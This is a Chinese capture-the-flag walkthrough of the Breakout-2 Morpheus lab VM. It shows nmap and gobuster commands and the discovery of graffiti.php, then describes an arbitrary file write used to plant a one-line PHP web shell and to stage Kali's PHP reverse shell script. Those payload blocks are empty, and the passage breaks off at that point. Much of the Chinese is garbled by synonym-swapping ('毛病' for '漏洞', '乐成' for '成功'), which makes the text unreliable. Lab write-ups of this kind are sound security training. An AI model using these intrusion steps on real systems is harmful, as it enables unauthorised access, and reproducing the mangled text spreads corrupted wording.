breakout-2-morpheus
本地假造机摆设,攻击机Kali(IP:10.1.1.128)
主机发现
确定目标主机IP地点10.1.1.130
端口扫描
TCP端口扫描
- nmap --min-rate 10000 -p- 10.1.1.130 -oA nmap_output/ports
复制代码- --min-rate 最低速率,由于本地虚拟机部署,无需考虑被封杀和资源消耗
复制代码 实战红队中:- nmap -sS -n -Pn -T2 --max-rate 2000 --max-retries 2 -p- 10.1.1.130 -oA nmap_output/ports
复制代码- -sS 半开扫描,并伪造源IP地址
- -n 不使用DNS解析
- -Pn 不做存活探测
- -T 指定扫描速率,不指定默认为T3(1~5,数字越大扫描越快)
- --max-rate 最大速率
- --max-retries 最大尝试次数
- -oA 三种格式(全格式)输出结果进行保存
复制代码
开放端口:22,80,81
端口具体信息扫描- nmap -sS -n -Pn -p 22,80,81,1 -sV -sC -O 10.1.1.130 -oA nmap_output/detail
复制代码- 1 指定一个处于关闭状态下的端口。如端口:1,在判断操作系统的时候,需要用开放的端口和关闭的端口进行比对
- -p 指定端口
- -sV 服务版本探测
- -sC 使用nmap默认脚本扫描
- -O 对操作系统进行识别探测
复制代码
UDP端口扫描
- nmap -sU --top-ports 100 10.1.1.130 -oA nmap_output/udp
复制代码
毛病脚本扫描
- nmap --script=vuln -p22,80,81 10.1.1.130 -oA nmap_output/vuln
复制代码
信息总结
- OS:Linux 4.15 - 5.19
- TCP端口开放:
- 22 OpenSSH 8.4p1 Debian 5 (protocol 2.0)
- 80 Apache httpd 2.4.51 ((Debian))
- 81 nginx 1.18.0 401 Authorization Required
- UDP端口开放:目前无实际利用价值
- 常见漏洞信息:无
- 80端口web服务有robots.txt文件
- /robots.txt
复制代码 WEB
欣赏器检察
有一行提示,大抵意思是已经锁定了SSH用户,以是推断目标固然开放了22端口,大概不答应举行长途SSH登录,突破口的战略将其放置到末了
检察网页源代码,并生存唯一的照片
图片隐写
检察图片隐写,无内容
robots.txt
没有使用代价
目次爆破
- gobuster dir -u http://10.1.1.130 -a "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
复制代码
观察了欣赏器插件wappalyzer
并没有发现web端的技能栈是什么,以是穷举一下,美满gobuster扫描,指定常见的文件后缀名- gobuster dir -u http://10.1.1.130 -a "Mozilla/5.0 (X11; Linux x86_64; rv:140.0) Gecko/20100101 Firefox/140.0" -x php,jsp,asp,txt -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt
复制代码
发现graffiti.txt和graffiti.php graffiti 涂鸦
欣赏器访问这2个文件
提交数据抓包
发现提交数字1,生存在graffiti.txt文件中
恣意文件写入
修改一下参数,是否能使用graffiti.php文件
后端源代码走漏
返回包直接走漏了graffiti.php后端源代码归去访问graffiti.php文件,发现提交的message参数值也同步表现了
那么直接在graffiti.php写入一句话木马
[code][/code]
验证一下是否剖析
乐成实行php代码
实行体系下令
反弹shell
kali自带php反弹shell脚本文件
/usr/share/webshells/php/php-reverse-shell.php
[code] |